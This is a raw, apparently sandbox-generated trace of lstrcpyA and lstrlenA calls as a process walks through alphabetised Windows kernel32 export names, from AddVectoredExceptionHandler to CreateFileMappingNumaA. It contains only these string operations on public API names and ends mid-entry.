lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.512] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.512] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.512] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.512] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.512] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.512] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.513] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.513] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.513] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.513] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.513] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.513] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.513] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.513] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.513] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.513] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.513] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.513] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.513] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.513] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.513] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.513] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.513] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.513] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.513] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.513] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.514] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.514] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.514] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.514] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.514] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.514] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.514] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.514] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.514] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.514] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.514] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.514] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.514] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.514] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.514] lstrlenA (lpString="BEEP") returned 4 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.514] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.514] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.514] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.514] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.515] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.515] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.515] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.515] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.515] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.515] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.515] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.515] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.515] lstrlenA (lpString="CANCELIO") returned 8 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.515] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.515] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.515] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.515] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.515] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.515] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.515] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.515] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.515] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.515] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.515] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.516] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.516] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.516] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.516] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.516] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.516] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.516] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.516] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.516] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.516] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.516] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.516] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.516] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.516] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.516] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.516] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.516] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.516] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.516] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.517] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.517] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.517] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.517] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.517] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.517] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.517] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.517] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.517] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.517] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.517] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.517] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.517] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.517] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.517] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.517] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.517] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.517] lstrlenA (lpString="COPYFILEA") returned 9 [0185.517] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.517] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.518] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.518] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.518] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.518] lstrlenA (lpString="COPYFILEW") returned 9 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.518] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.518] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.518] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.518] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.518] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.518] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.518] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.518] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.518] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.518] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.518] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.518] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.518] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.518] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.518] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.519] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.519] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.519] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.519] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.519] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.519] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.519] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.519] lstrcpyA (in: 